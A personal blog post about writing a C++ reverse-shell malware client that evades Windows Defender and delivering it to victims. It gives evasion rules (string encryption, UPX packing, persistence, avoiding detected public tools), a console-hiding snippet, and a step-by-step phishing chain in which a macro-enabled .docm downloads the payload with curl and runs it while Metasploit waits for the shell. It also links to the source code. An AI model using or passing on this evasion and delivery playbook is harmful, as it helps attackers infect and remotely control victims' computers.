Do not trust your Anti Malware

4 min readDec 2, 2020

I want to share my Malware development stroy from 0 to weaponized malware.

Everything started with a question to myself How hard is it to write Malware ? actually its depends on what you want, I just want to get reverse shell from victim and of course it will be persistent and evade Windows Defender or any anti malware software.

So I make research like 2–3 weeks and look some open source malwares from the internet, friendly reminder using those malware source codes as an payload or red teaming tool is big mistake but I learned so much good stuff.

In this journey I make some rule sets for develop my perfect undetectable malware *chuckles*

Don’ts

1-) Do not copy other Malware authors source code.

2-) Do not use any crypters from underground Russian hackers .

3-) Do not use publicly shared tools such as Invoke-Obfuscation v1.8, Unicorn ,Empire etc …

Do’s

1-) Use C++ it’s awesome for low level stuff and essay to use Windows API.

2-) Encrypt your communication and all strings.

3-) You need persistence and evasion so think clever.

4-) Weaponize your malware like using .docm with malicious VBA macro or phishing emails.

5-) Use custom(hard way) or public executable packer such as UPX for evasion and avoid Malware analysis.

When on my first try it’s like just turn on the defender and test your malware client on VM Windows 10 machine, I was not successful on my first try obviously my .exe file blocked by windows defender and then I update my source code ,like on previous version I used FreeConsole function and this function trigger the anti malware software’s.

Function for hide your client console:

void HideConsole(){
 ::ShowWindow(::GetConsoleWindow(), SW_HIDE);
}

I updated malware source code and test after test I get the reverse shell and evade anti defender, well that was fun but I think the hard part is weaponize your malware, I can get connection from victim using netcat or Metasploit multi handler but how to weaponize this malware ?

Find out site called any.run this site help malware analysis used for get informations about malware like finding spreading , evade and other technique’s used by malware I found very interesting and easy method for weaponize and spread the malware by using VBA macro enabled .docm file, well I was used VBA macros since I’m 13 years old lol , so step by steps:

1-) Obfuscate and pack your malware client.

2-) Use an http dropper with python http server.

3-) Create malicious macro enabled docm file for download malware with curl and execute on victim machine.

4-) Update your Windows machine and defender.

5-) Listen TCP traffic with Metasploit .

6-) Send this docm file to victim, victim enables macro code and some magic happened.

7-) Get TCP reverse shell and realize no system is safe specially the Windows :/

Tweet’s series

POC

Malware client source code

https://github.com/whichbuffer/ReverseShell

Note: I don’t share this for harmful hacking this version of my code is just for demo and not contain my fully functional malware source code that I used for red teaming operations, I just want to show how poor this anti virus systems like on this attack scenario .